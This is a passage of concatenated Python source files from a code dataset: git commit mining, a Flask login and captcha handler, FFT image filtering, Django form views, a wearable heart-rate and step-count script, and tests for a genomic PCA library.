repo_path,checkout_branch = 'master')\n return self.repo\n \n def get_branches(self):\n gb = get_all_branches(self.repo_url,self.repo_name)\n gb.clone_repo()\n return gb.get_branches()[1:]\n \n def repo_remove(self):\n self.repo.free()\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n deldir = self.repo_path + '/.git/objects/pack'\n else:\n deldir = self.repo_path + '\\\\.git\\\\objects\\\\pack'\n print(os.path.isfile(deldir))\n delFiles = [f for f in listdir(deldir) if isfile(join(deldir, f))]\n for i in delFiles:\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n file_name = deldir + '/' + i\n else:\n file_name = deldir + '\\\\' + i\n os.chmod(file_name, 0o777)\n if os.path.exists(self.repo_path):\n shutil.rmtree(self.repo_path,ignore_errors=True)\n \n def branch_remove(self,repo,path):\n repo.free()\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n deldir = path + '/.git/objects/pack'\n else:\n deldir = path + '\\\\.git\\\\objects\\\\pack'\n delFiles = [f for f in listdir(deldir) if isfile(join(deldir, f))]\n for i in delFiles:\n if platform.system() == 'Darwin' or platform.system() == 'Linux':\n file_name = deldir + '/' + i\n else:\n file_name = deldir + '\\\\' + i\n os.chmod(file_name, 0o777)\n if os.path.exists(path):\n shutil.rmtree(path,ignore_errors=True)\n \n \n def get_current_commit_objects(self):\n commits = []\n for commit in self.repo.walk(self.repo.head.target, GIT_SORT_TOPOLOGICAL | GIT_SORT_REVERSE):\n commits.append(commit)\n self.commit = commits\n return commits\n \n def get_commit_data(self,branch):\n commits = []\n repo = self.clone_branch(branch)\n path = self.repo_path + '_' + branch\n for commit in repo.walk(repo.head.target, GIT_SORT_TOPOLOGICAL | GIT_SORT_REVERSE):\n commits.append(commit)\n self.repos.append([repo,path]) \n return commits\n \n# def get_commit_objects(self):\n# commits = []\n# branches = 
self.get_branches()\n# self.repo_remove()\n# for branch in branches:\n# branch= branch.split(\"/\",1)[1]\n# repo = self.clone_branch(branch)\n# for commit in repo.walk(repo.head.target, GIT_SORT_TOPOLOGICAL | GIT_SORT_REVERSE):\n# commits.append(commit)\n# self.branch_remove(repo)\n# self.clone_repo()\n# self.commit = commits\n# print(len(commits))\n# return commits\n \n\n def get_commit_objects(self):\n commits = []\n threads = []\n commits = []\n branches = self.get_branches()\n self.repo_remove()\n for branch in branches:\n branch= branch.split(\"/\",1)[1]\n t = ThreadWithReturnValue(target = self.get_commit_data, args = [branch])\n threads.append(t)\n for i in range(0,len(threads),self.cores):\n _threads = threads[i:i+self.cores]\n for th in _threads:\n th.start()\n for th in _threads:\n response = th.join()\n commits.append(response)\n self.clone_repo()\n commits = list(itertools.chain.from_iterable(commits))\n temp = []\n for commit in commits:\n temp.append([commit.id.hex,commit])\n temp_df = pd.DataFrame(temp, columns = ['id','object'])\n temp_df.drop_duplicates(subset = ['id'], inplace = True)\n commits = temp_df['object'].tolist()\n self.commit = commits\n return commits\n \n# def get_committed_files(self,repo,commits):\n# committed_files = []\n# for i in range(len(commits)):\n# try:\n# if len(commits[i].parents) == 0: # need to handle this case where commit doesnot have a parent\n# continue\n# t0 = commits[i]\n# if i != 0:\n# t1 = commits[i].parents[0]\n# else:\n# continue\n# _diff = repo.diff(t1,t0)\n# for j in _diff.deltas:\n# committed_files.append([commits[i].id.hex,j.new_file.id.hex, j.new_file.mode,j.new_file.path])\n# except:\n# print(\"commit:\",commits[i].id)\n# continue\n# return committed_files\n \n def get_committed_files(self):\n committed_files = []\n commits = self.commit\n for i in range(len(commits)):\n try:\n if len(commits[i].parents) == 0: # need to handle this case where commit doesnot have a parent\n continue\n t0 = commits[i]\n if i != 0:\n t1 = commits[i].parents[0]\n else:\n continue\n _diff = self.repo.diff(t1,t0)\n for j in _diff.deltas:\n committed_files.append([commits[i].id.hex,j.new_file.id.hex, j.new_file.mode,j.new_file.path])\n except:\n print(\"commit:\",commits[i].id)\n continue\n for j in range(len(self.repos)):\n self.branch_remove(self.repos[j][0],self.repos[j][1])\n return committed_files\n \n def get_diffs(self,commits):\n diffs = {}\n for i in range(len(commits)):\n t0 = self.repo.get(commits[i])\n files = {}\n if len(t0.parents) == 0: # need to handle this case where commit doesnot have a parent\n continue\n if i != 0:\n t1 = t0.parents[0]\n else:\n continue\n _diff = self.repo.diff(t1,t0)\n for diff_i in _diff.__iter__():\n file_path = diff_i.delta.new_file.path\n old_lineno = []\n new_lineno = []\n for x in diff_i.hunks:\n for y in x.lines:\n old_lineno.append(y.old_lineno)\n new_lineno.append(y.new_lineno)\n files[diff_i.delta.new_file.id] = {'file_path':file_path, 'old_lines':old_lineno,'new_lines':new_lineno}\n diffs[t0.id] = {'files':files,'object':t0}\n return diffs\n \n def get_blame(self,file_path):\n return self.repo.blame(file_path,flags = 'GIT-BLAME_TRACK_COPIES_ANY_COMMIT_COPIES')\n \n \n def get_commits(self):\n _commits = self.get_current_commit_objects()\n commits = []\n for commit in _commits:\n commit_id = commit.id.hex\n commit_message = commit.message\n 
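            # Caveat on the pattern below: the braces are literal in Python's
            # re, so '|' alternates over the whole expression -- only the
            # first and last alternatives carry the \b anchors, 'bug' can only
            # match as '{bug', and bare alternatives like 'fix' also hit
            # substrings such as 'prefix'. A non-capturing group restores the
            # intended word-bounded alternation, roughly:
            #     r'\b(?:bug|fix|issue|error|...|resol)\b'
            # (same keyword list as below). Note too that the message is
            # stemmed first, so unstemmed keywords like 'issue' may need the
            # same treatment the pre-stemmed ones ('deprecat', 'investigat')
            # already got.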
res=re.search(r'\\b{bug|fix|issue|error|correct|proper|deprecat|broke|optimize|patch|solve|slow|obsolete|vulnerab|debug|perf|memory|minor|wart|better|complex|break|investigat|compile|defect|inconsist|crash|problem|resol|#}\\b',utils().stemming(commit_message),re.IGNORECASE)\n if res is not None:\n commits_buggy = 1\n else:\n commits_buggy = 0\n if len(commit.parent_ids) == 0:\n commit_parent = None\n else:\n commit_parent = commit.parent_ids[0].hex\n commits.append([commit_id,commit_message,commit_parent,commits_buggy])\n return commits\n ","sub_path":"src/main/git_log/git2repo.py","file_name":"git2repo.py","file_ext":"py","file_size_in_byte":11281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"432763820","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/7/29 1:39\n# @Author : WieAngeal\n# @File : login_hander.py\n# @Software: PyCharm\n\nfrom flask import Blueprint, request, session, render_template\nfrom flask import url_for\nfrom ..services import UserService\nfrom ..common import (ConsoleLogger, relative_path)\nfrom ..common.captcha import CaptchaTool\nfrom flaskapp import app\nimport json, jsonify\nimport hashlib\nimport ast\nfrom ..common import auth, auth_trd\nimport re, time\nimport requests\n\nlogger = ConsoleLogger(relative_path(__file__))\nuser_service = UserService()\nlogin = Blueprint('login', __name__, url_prefix='/api/auth')\n\n@login.route('/generate_token', methods=[\"GET\", \"POST\"])\ndef create_token():\n method = request.method\n if method == 'POST':\n userdata = ast.literal_eval(request.form.get('data'))\n json_data = auth.login_verify(userdata['telphone'], userdata['password'], userdata['timecode'])\n logger.info(json_data)\n return json_data\n\n@login.route('/login_token', methods=['GET', 'POST'])\ndef token_verify():\n try:\n data = request.form.get('data')\n _token = json.loads(data)\n token = _token['_token'][0]\n rsp = auth.verify_auth_token(token)\n json_data = json.dumps(rsp)\n logger.info(json_data)\n return json_data\n except Exception as e:\n logger.error(e)\n\n@login.route('/register', methods=['GET', 'POST'])\ndef register_user():\n try:\n data = json.loads(request.form.get('data'))\n json_data = json.dumps(auth.register_user(data))\n return json_data\n except Exception as e:\n logger.error(e)\n\n\n@login.route('/imgcode', methods=['GET', 'POST'])\ndef get_verify_code():\n method = request.method\n if method == 'GET':\n try:\n new_captcha = CaptchaTool()\n img, code = new_captcha.get_verify_code()\n # 存入session\n session[\"code\"] = code\n return img\n except Exception as e:\n logger.error(e)\n\n@login.route('/verifycode', methods=[\"GET\", \"POST\"])\ndef verify_code():\n method = request.method\n if method == 'POST':\n try:\n userdata = ast.literal_eval(request.form.get('data'))\n if userdata['verifycode'] != session['code']:\n logger.error(\"验证码错误\" + userdata['verifycode'])\n return json.dumps(auth.rep_json_data(code=0, msg=\"验证码错误,请重新输入!\"))\n return json.dumps(auth.rep_json_data(code=1, msg=\"验证码正确!\"))\n except Exception as e:\n logger.error(e)\n\n@login.route('/wechat_code', methods=['GET', 'POST'])\ndef wechat_login():\n url = \"https://login.weixin.qq.com/qrcode/oel9rit2RA==\"\n json_data = json.dumps(url)\n logger.info(json_data)\n return json_data\n\n","sub_path":"flaskapp/views/login_handler.py","file_name":"login_handler.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 
+{"seq_id":"3271686","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv.imread(\"riya.jpg\", 0)\nprint(img.shape)\n\n# 傅里叶变换\nf = np.fft.fft2(img)\n\n# 把中心点移动到中间\nfshift = np.fft.fftshift(f)\n\n# 获取幅值\nmagnitude_spectrum = 20 * np.log(np.abs(fshift))\n\n# 显示傅里叶变换后的二维图像\nplt.figure(figsize=(10, 10))\nplt.subplot(221), plt.imshow(img, cmap=\"gray\")\nplt.title('Input Image'), plt.xticks([]), plt.yticks([])\nplt.subplot(222), plt.imshow(magnitude_spectrum)\nplt.title('Magnitude Image'), plt.xticks([]), plt.yticks([])\n\n# 去掉低频信号\nrow, col = img.shape\ncX, cY = col // 2, row // 2\nfshift[(cY - 30):(cY + 30), (cX - 30):(cX + 30)] = 0\n\n# 傅里叶逆变换\nfshift_b = np.fft.ifftshift(fshift)\nf_b = np.fft.ifft2(fshift_b)\nimg_back = np.abs(f_b)\n\n# 显示逆变换后的图片\nplt.subplot(223), plt.imshow(img_back, cmap=\"gray\")\nplt.title('Output Image'), plt.xticks([]), plt.yticks([])\nplt.subplot(224), plt.imshow(img_back)\nplt.title('Result in JET'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n","sub_path":"DeepLearningStudy/test/fft_numpy.py","file_name":"fft_numpy.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"255250428","text":"# coding:utf-8\nimport asyncio\nimport time\n\nimport requests\n\n\n@asyncio.coroutine\ndef main():\n loop = asyncio.get_event_loop()\n future1 = loop.run_in_executor(None, requests.get, 'http://httpbin.org/ip')\n future2 = loop.run_in_executor(None, requests.get, 'http://www.sina.com.cn')\n start = time.time()\n response1 = yield from future1\n print(time.time() - start)\n start = time.time()\n response2 = yield from future2\n print(time.time() - start)\n print(len(response1.text))\n print(len(response2.text))\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n","sub_path":"test/test_asyncio_requests.py","file_name":"test_asyncio_requests.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"566473122","text":"import json\nimport os.path\n\npath = \"./log.txt\"\n\n# Funcion para almacenar datos de respaldo\ndef saveBackup(data):\n # Abrir archivo de respaldo y agregar data en formato string al final\n f = open(path, \"a\")\n f.write(json.dumps(data) + \"\\n\")\n f.close()\n\n# Funcion para revisar si existen datos en el archivo\ndef loadBackup():\n # Verificar si existe el archivo, si no existe el archivo, retornar False\n if os.path.isfile(path):\n # abrir el archivo y almacenar en un array los datos en formato json\n data = []\n f = open(path)\n for line in f:\n # Eliminar los saltos de linea de cada dato y convertirlos a json\n data.append(json.loads(str(line).replace(\"\\n\",\"\")))\n f.close()\n # validar el largo de los datos antes de responder, si esta vacio, retornar false\n if len(data) > 0:\n return data\n else:\n return False\n else:\n return False\n\n# Funcion para limpiar archivo backup\ndef clean():\n f = open(path,\"w\")\n f.write(\"\")\n f.close()\n\n# Funcion para almacenar en archivo TXT la fecha y hora del dato recibido.\ndef recivedLog(datetime):\n f = open(path, \"a\")\n f.write(datetime + \" No hay Conexion. 
\\n\")\n f.close()\n return True\n\n# Funcion para almacenar en archivo TXT el error de la exception\ndef recivedExcept(datetime, error):\n f = open(\"./error.txt\", \"a\")\n f.write(\"=====================\\n\")\n f.write(datetime + \" \\n\")\n f.write(str(error[0]))\n f.write(\"\\n\")\n f.write(str(error[1]))\n f.close()\n return True","sub_path":"serverPivot/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61490714","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render, render_to_response\nfrom django.views.generic.edit import FormView, UpdateView\n\nfrom missions.forms.customer import CustomerForm\nfrom missions.forms.mission import MissionForm\nfrom missions.forms.report import ReportForm\nfrom missions.models import Customer\n\nfrom django.contrib.auth.decorators import login_required\n\nclass CustomerView(FormView):\n template_name = 'customer.html'\n form_class = CustomerForm\n success_url = '/missions/customer'\n \n def form_valid(self, form):\n form.save()\n super(CustomerView, self).form_valid(form)\n \n return HttpResponseRedirect(self.success_url)\n \nclass MissionView(FormView):\n template_name = 'mission.html'\n form_class = MissionForm\n success_url = '/missions/mission'\n \n def form_valid(self, form):\n form.save()\n super(MissionView, self).form_valid(form)\n \n return HttpResponseRedirect(self.success_url)\n \nclass ReportView(FormView):\n template_name = 'report.html'\n form_class = ReportForm\n success_url = '/missions/report'\n \n def form_valid(self, form):\n form.save()\n super(ReportView, self).form_valid(form)\n \n return HttpResponseRedirect(self.success_url)\n \n@login_required\ndef customer_list(request, template='customer_list.html'):\n customers = Customer.objects.all()\n context = {\n 'customers': customers,\n }\n return render_to_response(template, context)\n\n\nclass CustomersUpdateView(UpdateView):\n template_name = 'customer.html'\n success_url = '/heroes/successcurrentteam'\n model = Customer\n form_class = CustomerForm\n \n \n \n","sub_path":"missions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"562255020","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 20 14:48:13 2020\n\n@author: joyceeito\n\"\"\"\n\n\nfrom Libraries.Connection import Connection\nfrom Libraries.Visualization import Visualization\nfrom Libraries.ppg import PPG\nfrom Libraries.Pedometer import Pedometer\nimport numpy as np\nimport matplotlib.pyplot as plt\n#from Libraries.ML import ML\nfrom scipy import signal\n\nclass Wearable:\n \n def __init__(self, serial_name, baud_rate):\n self.connection = Connection(serial_name, baud_rate)\n \n def collect_data(self,num_samples):\n \n self.connection.start_streaming()\n while self.connection.get_num_samples() < 500:\n try:\n self.connection.read_serial()\n except(KeyboardInterrupt):\n self.connection.end_streaming()\n self.connection.close_connection()\n print(\"Exiting program due to KeyboardInterrupt\")\n exit()\n self.connection.end_streaming()\n \n def run(self):\n self.connection.setup_connection()\n self.collect_data(500)\n self.connection.calc_sampling_rate()\n data_array = self.connection.data_array\n np.savetxt('hello.csv', data_array, delimiter=',')\n data_array_from_file = np.genfromtxt('hello.csv', 
delimiter=',')\n self.visualization = Visualization(data_array_from_file)\n self. visualization.plotData()\n self.my_plotter = Visualization(data_array_from_file)\n s = data_array_from_file[:,4]\n self.ppg = PPG(s)\n baseline = self.ppg.baseline()\n detrend = self.ppg.detrend(baseline,15)\n filtr = self.ppg.normalize_signal(detrend)\n plt.clf()\n plt.plot(filtr)\n plt.show()\n self.ppg.signal_diff()\n heartrate = self.ppg.calc_heart_rate(filtr)\n print(heartrate)\n heartrate = str(heartrate)\n heartrate = heartrate + '\\n'\n self.connection.send_serial(heartrate)\n #Lab5C3\n self.ped = Pedometer(500, data_array[:,0:4])\n step_count, inds = self.ped.process_data()\n print(step_count)\n self.my_plotter = Visualization(self.ped.data_array)\n self.my_plotter.plot_pedometer(self.ped.filtered_data,inds)\n #print(inds)\n step_count = str(step_count)\n step_count = step_count + '\\n'\n self.connection.send_serial(step_count)\n self.connection.close_connection()\n \n \n \n #def lab5(self):\n # directory = \"/Users/joyceeito/Downloads/SPring2020/ece16sp2020-ajito44/src/Python/Data_Lab5_ML/Training/\"\n # testing = \"/Users/joyceeito/Downloads/SPring2020/ece16sp2020-ajito44/src/Python/Data_Lab5_ML/Testing/\"\n # x = ML()\n # x.train_hr_model(directory)\n #y,z = x.test_hr_model(testing)\n #print(y)\n #print(z)\n \n \n def samples(self, num_samples):\n \n i = 0\n while i < num_samples:\n try:\n self.connection.read_serial()\n i = i+1\n except(KeyboardInterrupt):\n self.connection.end_streaming()\n self.connection.close_connection()\n print(\"Exiting program due to KeyboardInterrupt\")\n exit()\n \n def GrandChallenge(self):\n self.connection.start_streaming()\n count = 0\n while True:\n \n self.samples(100*32)\n data_array = self.connection.data_array\n s = data_array[:,4]\n self.ppg = PPG(s)\n self.ped = Pedometer(100, data_array[:,0:4])\n \n if count == 0:\n b,a,zi_in = self.ppg.onlyonce()\n c,d,zi_in2 = self.ped.onlyonce()\n count = count + 1\n else:\n zi_in = self.ppg.lfilter(b,a,zi_in)\n plt.cla()\n plt.subplot(211)\n plt.plot(self.connection.data_array[:,0],self.ppg.signal)\n heartrate = self.ppg.calc_heart_rate(self.ppg.signal)\n print(heartrate)\n heartrate = str(heartrate)\n heartrate = heartrate + '\\n'\n self.connection.send_serial(heartrate)\n zi_in2 = self.ped.lfilter(c,d,zi_in2)\n step_count, inds = self.ped.count_steps()\n plt.subplot(212)\n plt.plot(self.connection.data_array[:,0],self.ped.filtered_data)\n plt.show(block=False)\n plt.pause(0.001)\n print(step_count)\n step_count = str(step_count)\n step_count = step_count + '\\n'\n self.connection.send_serial(step_count)\n \ndef main():\n wearable = Wearable('/dev/cu.Angela_Bluetooth-ESP32S', 115200)\n #wearable.run()\n #wearable.lab5()\n wearable.GrandChallenge()\n \n \nif __name__ == \"__main__\":\n main()","sub_path":"src/Python/Wearable.py","file_name":"Wearable.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"328062313","text":"\"\"\"\nМодуль, описывающий класс игрока\n\"\"\"\n# pylint: disable=C0321\n# pylint: disable=E1101\nimport math\nimport pygame\nimport settings\nimport point\nimport world\n\n#Класс для игрока\nclass Player(point.Point):\n \"Класс, описывающий игрока\"\n velocity = 10\n angle = 0\n score = 0\n lines = list()\n\n def __init__(self, x0, y0):\n \"Конструктор\"\n point.Point.__init__(self, x0, y0)\n self.x = x0\n self.y = y0\n self.score = 0\n for _ in range(7):\n self.lines.append((0, settings.BLACK))\n\n def 
update_lines(self):\n \"Обновляет линии\"\n for i in range(len(self.lines)):\n collide_wall = False\n collide_target = False\n collide_false_target = False\n collide = collide_wall or collide_target or collide_false_target\n while self.lines[i][0] < 100 and not collide:\n #увеличивает длину луча\n self.lines[i] = (self.lines[i][0] + 2, self.lines[i][1])\n\n #x и y координаты конца i-го луча\n angle = self.angle-math.pi/2+math.pi*(i+1)/8\n x_coordinate = self.x + self.lines[i][0]*math.cos(angle)\n y_coordinate = self.y + self.lines[i][0]*math.sin(angle)\n\n #определияет сталикивается ли конец луча хотя бы с одной из стен\n collide_wall = world.GAME_WORLD.is_collide_wall((int(x_coordinate),\n int(y_coordinate)))\n collide_target = world.GAME_WORLD.is_collide_target((int(x_coordinate),\n int(y_coordinate)))\n collide_false_target = world.GAME_WORLD.is_collide_false_target((int(x_coordinate),\n int(y_coordinate)))\n collide = collide_wall or collide_target or collide_false_target\n\n #если сталкивается\n if collide_wall:\n #меняет цвет луча\n self.lines[i] = (self.lines[i][0], settings.GREEN)\n if collide_target:\n self.lines[i] = (self.lines[i][0], settings.RED)\n if collide_false_target:\n self.lines[i] = (self.lines[i][0], settings.BLUE)\n\n def draw(self):\n \"\"\"Рисует игрока\"\"\"\n #Обновляет линии\n \"\"\"for i in range(len((self.lines)):\n angle = self.angle-math.pi/2+math.pi*(i+1)/8\n # Начало и конец луча\n A, B = point.Point(self.x, self.y), point.Point(100*cos(angle),100*sin(angle))\n min_wall = 100 #Расстояние до ближайшей стены\n for wall in GAME_WORLD.walls:\n if wall.cross(A, B):\n d = self.distance_to_line(wall.start, wall.end)\n if d < min_wall:\n min_wall = d\n min_target = 100 #Расстояние до ближайшей точки\n for interation_point in GAME_WORLD.target:\n d = iteration_point.distance_to(self)#Реализовать\n if d < min_target:\n min_target = d\n if min_wall < min_target:\n self.lines[i] = (self.lines[i][0], green)\n if min_wall > min_target:\n #Столкновение с целью\n if min_wall == min_target and min_wall == 100:\n self.lines[i] = (100, black)\"\"\"\n\n #Рисует линии\n i = 0\n for line in self.lines:\n i += 1\n pygame.draw.line(settings.GAME_DISPLAY,\n line[1],\n (self.x, self.y),\n (int(self.x + line[0]*math.cos(self.angle-math.pi/2+math.pi*i/8)),\n int(self.y + line[0]*math.sin(self.angle-math.pi/2+math.pi*i/8))),\n 2)\n self.clear_lines()\n #Рисует точку\n pygame.draw.circle(settings.GAME_DISPLAY, settings.BLACK, (self.x, self.y), 22)\n pygame.draw.circle(settings.GAME_DISPLAY, settings.WHITE, (self.x, self.y), 20)\n\n def clear_lines(self):\n \"Обнуляет линии\"\n self.lines = list()\n for _ in range(7):\n self.lines.append((0, settings.BLACK))\n\n def move(self, delpha_x, delpha_y):\n \"\"\"Передвигает игрока\"\"\"\n self.x += delpha_x\n self.y += delpha_y\n\n def controller_polar(self):\n \"\"\"Обрабатывает нажатие клавиатуры элементов управления\"\"\"\n delpha = 0\n key_states = pygame.key.get_pressed()\n if key_states[pygame.K_LEFT]:\n self.angle += -math.pi/10\n elif key_states[pygame.K_RIGHT]:\n self.angle += +math.pi/10\n if key_states[pygame.K_UP]:\n delpha = self.velocity\n elif key_states[pygame.K_DOWN]:\n delpha = -self.velocity\n else:\n delpha = 0\n self.move(int(delpha * math.cos(self.angle)), int(delpha * math.sin(self.angle)))\n self.update_lines()\n ","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 
+{"seq_id":"556394938","text":"#-*- coding='utf-8' -*-\nfrom datetime import datetime\nimport mouse as MS\nimport keyboard as KB\nimport pyautogui as PA\n#from PyQt5.QtWidgets import QWidget ,QPushButton\n\ndef file_test():\n try:\n file = open('settings.conf','rt',encoding='utf-8')\n except FileNotFoundError:\n file = open('settings.conf','wt',encoding='utf-8')\n file.write(' ')\n file.close()\n return False\n line = file.readline()\n if line == ' ':\n return False\n else:\n return True\n\n\ndef setting():\n conf = open('settings.conf','wt',encoding='utf-8')\n print(\"Left Click on Left Upper Side\")\n request = False\n while(1):\n if MS.is_pressed():\n left_upper = MS.get_position();\n break\n print(\"Right Click on Right Lower Side\")\n while(1):\n if MS.is_pressed(MS.RIGHT):\n right_lower = MS.get_position();\n break\n hotkey = 'Hotkey = ctrl+alt'\n\n conf.write('Left_Upper = ' + str(left_upper[0]) + ',' + str(left_upper[1])+'\\n')\n conf.write('Size = '+ str(right_lower[0]-left_upper[0]) + ',' + str(right_lower[1]-left_upper[1])+'\\n')\n conf.write(hotkey)\n conf.close()\n print('Setting Complete')\n '''\n print(\"If You want to set hotkey Press S, or Not Press Q\")\n while(1):\n if KB.is_pressed('s'):\n request = True\n break\n if KB.is_pressed('q'):\n request = False\n break\n if request:\n '''\n\ndef loading():\n loc = []\n hotkey = ''\n conf = open('settings.conf','rt',encoding='utf-8')\n for line in conf:\n if line[0] == 'L' or line[0] == 'S':\n x = int(line[line.find('= ') + 2:line.find(',')])\n y = int(line[line.find(',') + 1:line.find('\\n')])\n loc.append(x)\n loc.append(y)\n else:\n hotkey = line[line.find('= ') + 2:]\n conf.close()\n return tuple(loc), hotkey\n\ndef capture(loc):\n now = str(datetime.now().year) + '_' + str(datetime.now().month) + '_' + str(datetime.now().day) + '_' + str(datetime.now().hour)+'_' + str(datetime.now().minute) + '_' + str(datetime.now().second)\n path = './screenshot/' + now + '.png'\n PA.screenshot(path,region=loc)\n\ndef show_info():\n print('If You Want Capture, press CTRL+ALT')\n print('If You Want Exit, press CTRL+Q')\n print('If You Want to change Setting, press CTRL+SHIFT')\n\ndef main():\n if file_test() is False:\n setting()\n location , hotkey = loading()\n show_info()\n while(1):\n if KB.is_pressed(hotkey):\n capture(location)\n if KB.is_pressed('ctrl+shift'):\n setting()\n location , hotkey = loading()\n show_info()\n if KB.is_pressed('ctrl+q'):\n break\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n\n\n","sub_path":"Personal Study/2021/Screen_Capture_Project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456462114","text":"import lostructpy as ls\nimport cyvcf2 as vcf\nimport sparse\nimport numpy as np\nfrom itertools import islice\nfrom skbio.stats.ordination import pcoa\n\n# TODO: Rewrite this to make early VCF parsing and PCA stuff one-time run\n\n# This codeblock taken from https://docs.python.org/3/library/itertools.html\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n#...\n\nvcf_file = \"chr1-filtered.vcf.gz\"\n\ndef test_readvcf():\n assert(ls.get_landmarks(vcf_file)[0] == \"chl_Mt\")\n assert(ls.get_samples(vcf_file)[0] == \"HM017-I\")\n assert(len(ls.get_samples(vcf_file)) == 50)\n\ndef test_partitionall():\n assert(len(list(ls.partition_all(3, range(10)))[3]) == 1)\n\ndef test_getsnps():\n record = next(ls.get_snps(vcf_file, 
\"chr1\"))\n assert(isinstance(record, vcf.Variant))\n\ndef test_getgts():\n record = next(ls.get_snps(vcf_file, \"chr1\"))\n gts = ls.get_gts(record)\n assert(gts.shape == (50,))\n assert(gts[0] == 2.)\n assert(gts[-1] == 2.)\n\ndef test_parse_vcf():\n windows, positions = ls.parse_vcf(vcf_file, \"chr1\", 99)\n assert(len(windows) == 119)\n assert(len(positions) == len(windows))\n assert(positions[0][0] == 59864)\n assert(isinstance(windows[0], sparse.COO))\n\nerror_tolerance = 0.00000001\n\ndef test_cov_pca():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 99)\n covmat, total_variance, eigenvals, eigenvecs = ls.cov_pca(windows[0].todense(), 5, 1)\n assert(np.abs(np.sum(covmat) - -0.4784263654778492) <= error_tolerance)\n assert(np.abs(np.sum(total_variance) - 0.9265612493057297) <= error_tolerance)\n assert(np.abs(np.sum(eigenvals) - 1.735862014813605) <= error_tolerance)\n assert(np.abs(np.sum(eigenvecs) - 0.13157175919284625) <= error_tolerance)\n\ndef test_eigen_windows():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 99)\n covmat, total_variance, eigenvals, eigenvecs = ls.eigen_windows(windows[0], 5, 1)\n assert(np.abs(np.sum(covmat) - -0.4784263654778492) <= error_tolerance)\n assert(np.abs(np.sum(total_variance) - 0.9265612493057297) <= error_tolerance)\n assert(np.abs(np.sum(eigenvals) - 1.735862014813605) <= error_tolerance)\n assert(np.abs(np.sum(eigenvecs) - 0.13157175919284625) <= error_tolerance)\n\ndef test_l1_norm():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 99)\n _, _, eigenvals, _ = ls.eigen_windows(windows[0], 5, 1)\n assert(np.sum(ls.l1_norm(eigenvals)) == 5.0)\n\n# Many of these tests are redundant, so this one won't be...\n# It also tests dist_sq_from_pcs so we won't test that separately...\ndef test_get_pcs_dists():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 99)\n result = list()\n for x in take(4, windows):\n result.append(ls.eigen_windows(x, 10, 1))\n result = np.vstack(result)\n pc_dists = ls.get_pc_dists(result)\n\n assert(pc_dists[0][0] == 0.0)\n assert(np.abs(pc_dists[0][3] - 0.30474948474286145) <= error_tolerance)\n\ndef test_compare_to_rcode():\n windows, _ = ls.parse_vcf(vcf_file, \"chr1\", 95)\n covmat, total_variance, eigenvals, eigenvecs = ls.cov_pca(windows[0].todense(), 10, 1)\n\n results = np.loadtxt(\"lostruct-results/chr1.filtered.pca.csv\", \n delimiter=\",\", \n skiprows=1)\n\n totalandvalsR = results[0][0:11]\n totalandvalsPy = np.concatenate(([total_variance], eigenvals)),\n # Comes out as 0.9999921929150888\n assert(np.corrcoef(totalandvalsR, totalandvalsPy)[0][1] >= 0.99999)\n\n # Squared here, because signs are often opposite between the two analyses.\n eigenvecsR = np.square(results[0][11:61])\n eigenvecsPy = np.square(eigenvecs[0])\n # Comes out as 0.9999921929150888\n assert(np.corrcoef(eigenvecsR, eigenvecsPy)[0][1] >= 0.99999)\n assert(covmat.shape == (50, 50))\n\n mds_coords = np.loadtxt(\"lostruct-results/mds_coords.csv\", \n delimiter=\",\", skiprows=1, usecols=[2])\n\n result = list()\n for x in windows:\n result.append(ls.eigen_windows(x, 10, 1))\n result = np.vstack(result)\n pc_dists = ls.get_pc_dists(result)\n mds = pcoa(pc_dists)\n # Comes out as 0.9971509982243156\n assert(np.corrcoef(mds.samples['PC1'], mds_coords)[0][1] >= 0.995)\n","sub_path":"tests/test_fns.py","file_name":"test_fns.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"622114950","text":"#!/usr/local/bin/python3.7\n\n# 
